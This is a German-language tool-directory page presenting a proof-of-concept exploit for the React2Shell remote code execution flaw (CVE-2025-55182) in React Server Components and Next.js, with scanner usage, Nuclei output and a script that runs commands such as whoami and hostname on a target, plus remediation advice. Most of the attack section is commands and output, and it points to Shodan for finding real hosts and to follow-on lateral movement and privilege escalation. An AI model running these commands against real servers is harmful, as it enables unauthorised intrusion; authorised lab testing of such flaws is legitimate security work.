Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
React2Shell-PoC-CVE-2025-55182 — Proof-of-concept-Exploit für die CVE-2025-55182 (React2Shell) RCE-Sicherheitslücke in React Server Components. Enthält einen Scanner für verwundbare Hosts und ein Shell-Skript zur Remote-Befehlsausführung. Nur für autorisierte Sicherheitstests und zu Bildungszwecken. | Kitploit
Tools/GitHubGitHub/eagle-nett/react2shell-poc-cve-2025-55182
AufklärungSchwachstellenscannerExploitationWebanwendungs-ExploitationPenetrationstestsLernen & BildungLabs & Praxis
GitHubeagle-nett/react2shell-poc-cve-2025-55182

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →

React2Shell-PoC-CVE-2025-55182

Proof-of-concept-Exploit für die CVE-2025-55182 (React2Shell) RCE-Sicherheitslücke in React Server Components. Enthält einen Scanner für verwundbare Hosts und ein Shell-Skript zur Remote-Befehlsausführung. Nur für autorisierte Sicherheitstests und zu Bildungszwecken.

Repository anzeigen
1vor 5 MonatenNoch nicht geprüft
Teilen

Simulation der React2Shell-Ausnutzung (CVE-2025-55182)

Hinweis:

  • Dieses Dokument dient ausschließlich zu Lern- und Sicherheitsforschungszwecken.
  • Nicht für Angriffe auf Systeme ohne Genehmigung verwenden.

1. Überblick

CVE-2025-55182, auch bekannt als React2Shell, ist eine schwerwiegende Remote Code Execution (RCE)-Schwachstelle, die React Server Components (RSC) betrifft. Sie nutzt das Flight-Protokoll zur Kommunikation zwischen Client und Server. Wenn der Client Daten anfordert, empfängt der Server einen Payload, analysiert diesen und ermöglicht es einem Angreifer möglicherweise, schädliche Strukturen oder beliebigen Code einzuschleusen, den React als gültig akzeptiert.

KategorieInhalt
SchweregradCritical (CVSS 10.0)
TypUnsafe Deserialization (CWE-502)
AngriffsmethodeRemote, keine Authentifizierung erforderlich
Betroffene Versionen:React: 19.0.0, 19.1.0, 19.1.1, 19.2.0 und Next.js: 15.0.0 – 15.0.4, 15.1.0 – 15.1.8, 15.2.0 – 15.2.5, 15.3.0 – 15.3.5, 15.4.0 – 15.4.7, 15.5.0 – 15.5.6, 16.0.0 – 16.0.6

2. Ursache

Der Server verarbeitet Payloads vom Client ohne ausreichende Validierung, was einem Angreifer Folgendes ermöglicht:

  • Einschleusen schädlicher Payloads
  • Ausführen von Code auf dem Server
  • Ausnutzung ohne Benutzerauthentifizierung, da es sich um eine Schwachstelle vor der Authentifizierung handelt.

Ausnutzungsaktivitäten im Zusammenhang mit dieser Schwachstelle wurden seit dem 5. Dezember 2025 beobachtet. Die meisten erfolgreichen Ausnutzungen stammen von Bewertungen durch Angriffsgruppen. Sowohl Windows- als auch Linux-Umgebungen sind betroffen.

3. Experiment

Installation

root@kitploit:~
pip install -r requirements.txt

Scannen eines anfälligen Servers:

root@kitploit:~
python3 scanner.py -u https://example.com

Geben Sie den zu scannenden Pfad ein (hier gebe ich meinen anfälligen Server ein: http://192.168.10.1:3000)

image

Erhaltenes Ergebnis:

image
root@kitploit:~
╰─ python3 scanner.py -u http://192.168.10.1:3000             

brought to you by assetnote

[*] Loaded 1 host(s) to scan
[*] Using 10 thread(s)
[*] Timeout: 10s
[*] Using RCE PoC check
[!] SSL verification disabled

[VULNERABLE] http://192.168.10.1:3000 - Status: 303

Darüber hinaus können Sie je nach Ihren Ausnutzungszwecken weitere Scans durchführen:

Scannen einer Hostliste:

root@kitploit:~
python3 scanner.py -l hosts.txt

Multithreaded scannen und Ergebnisse speichern:

root@kitploit:~
python3 scanner.py -l hosts.txt -t 20 -o results.json

Scannen mit benutzerdefinierten Headern:

root@kitploit:~
python3 scanner.py -u https://example.com -H "Authorization: Bearer token" -H "Cookie: session=abc"

Windows-Ziele scannen:

root@kitploit:~
python3 scanner.py -u https://example.com --windows

Sicheren Nebenkanal-Erkennungsmodus verwenden:

root@kitploit:~
python3 scanner.py -u https://example.com --safe-check
image

Wie Sie sehen, liegt eine Sicherheitslücke vor, was bedeutet, dass der von uns bereitgestellte Server anfällig für Angriffe ist.


Nuclei

Jetzt verwenden wir Nuclei, um zu prüfen, ob der Server eine Schwachstelle mit einem POC aufweist. Diese Funktion sendet benutzerdefinierte Anfragen, reduziert Fehlalarme (False Positives) und unterstützt paralleles Scannen.

root@kitploit:~
nuclei -t scan.yaml -u http://192.168.10.1:3000

Erzieltes Ergebnis:

root@kitploit:~
[INF] Current nuclei version: v3.7.1 (latest)
[INF] Current nuclei-templates version: v10.4.0 (latest)
[INF] New templates added in latest release: 94
[INF] Templates loaded for current scan: 1
[INF] Executing 1 signed templates from projectdiscovery/nuclei-templates
[INF] Targets loaded for current scan: 1
[CVE-2025-55182] [http] [critical] http://192.168.10.1:3000
[INF] Scan completed in 431.97876ms. 1 matches found.
image

Das System hat erkannt, dass dieser Server anfällig ist und durch die Schwachstelle CVE-2025-55182 ausgenutzt werden kann. Und daran sehen Sie, dass es sich um eine ziemlich gefährliche und wichtige Schwachstelle handelt, zu der es viele POCs auf Social-Media-Plattformen gibt. ☺☺☺

4. Ausnutzungsmethode

Sie können sehen, dass diese Informationen ausreichen, um die Existenz der Sicherheitslücke in der obigen Anwendung zu bestätigen. Um zu beweisen, dass diese Anwendung zum Ausführen eines Befehls oder zur Remote-Code-Ausführung missbraucht werden kann, beginne ich mit dem PoC.

root@kitploit:~
chmod +x scanner.sh

Verwendung

root@kitploit:~
# Prüfen, ob das Ziel anfällig ist
./datscan.sh -d example.com

# Befehl ausführen, um aktuellen Benutzer zu prüfen
./datscan.sh -d example.com -c "whoami"

# With full URL
./datscan.sh -d example.com -c "uname -a"
image

Bedeutung:

Gibt den aktuellen Benutzer zurück, der den Serverprozess ausführt

Hilft bei der Bestimmung:

  • Unter welchem Benutzer die Anwendung läuft
  • Berechtigungsstufe (niedrige Rechte oder Admin)

=> Dies ist der grundlegendste Befehl, um eine erfolgreiche RCE zu bestätigen

Note

  • -d, --domain - domain/URL
  • -c, --command - Auszuführender Befehl (z.B. whoami, hostname,...)

Beispiel

root@kitploit:~
# Prüfen des Hostnamens
./datscan.sh -d http://192.168.10.1:3000/ -c hostname  

# Betriebssystemversion ermitteln
./datscan.sh -d http://192.168.10.1:3000/ -c ver 

# Prüfen, ob die Befehlsausführung stabil funktioniert
./datscan.sh -c "echo test"

./datscan.sh -d http://192.168.10.1:3000/ -c "echo %USERNAME%"

./datscan.sh -d http://192.168.10.1:3000/ -c "echo %COMPUTERNAME%"

BILD NACH DER AUSFÜHRUNG

image

Dies ist der Schritt der initialen Reconnaissance nach erfolgreicher Ausnutzung.

Hilft uns zu bestätigen: RCE funktioniert, Betriebssystem identifizieren,...

ACHTUNG

Da ich diese Demonstration in einer persönlichen Laborumgebung durchführe, um rechtliche Konsequenzen zu vermeiden, kann die Verwendung von HTTP-Headern zum Datendiebstahl, große Ausgaben oder Sonderzeichen Folgendes verursachen:

  • ERR_INVALID_CHAR
  • Reduzierte Antwort
  • Timeouts
image

Kurze Befehle (z.B. whoami, ver) sind zuverlässiger für die Veranschaulichung in der obigen Testumgebung.

Wenn Sie das nicht möchten, können Sie Shodan verwenden, um direkt IP-Adressen in der realen Umgebung zu überprüfen und wie in meinem obigen Experiment auszunutzen (nicht empfohlen).

image

Wie oben erwähnt. Dieses Tool dient nur zu Bildungszwecken und autorisierten Sicherheitstests. Verwenden Sie dieses Tool nicht zum Testen von Systemen, die Sie nicht besitzen oder für die Sie keine Testberechtigung haben.

5. Behebungsmöglichkeiten

  • Vertrauen Sie keinen Daten vom Client
  • Strenge Eingabevalidierung
  • Versionen aktualisieren
    • React: >= 19.0.1 / 19.1.2 / 19.2.1
    • Next.js: >= 15.0.5 / 16.0.7

6. Weitere Referenzen

  • CVE-2025-55182 – https://nvd.nist.gov/vuln/detail/CVE-2025-55182
  • CVE-2025-55182 - https://www.dynatrace.com/news/blog/cve-2025-55182-react2shell-critical-vulnerability-what-it-is-and-what-to-do/
Tool herunterladen
Bedeutung der ausgeführten BefehleInhalt
Gibt den Hostnamen zurückVerwendung:
- Identifikation des betroffenen Systems
- Unterstützung von Lateral Movement (in internen Umgebungen)
Ermittelt die BetriebssystemversionWichtig für:
- Bewertung der weiteren Ausnutzbarkeit (Privilege Escalation)
- Auswahl des geeigneten Exploits
Prüft die BefehlsausführungDient zum Debuggen von Payload/Scanner
Gibt den aktuellen Benutzernamen zurückIn diesem Fall:
- Benutzer ist ADMIN → möglicherweise hohe Rechte
- Wichtiger als whoami in einigen Windows-Fällen
Gibt den Hostnamen zurückGibt den Hostnamen über eine Umgebungsvariable zurück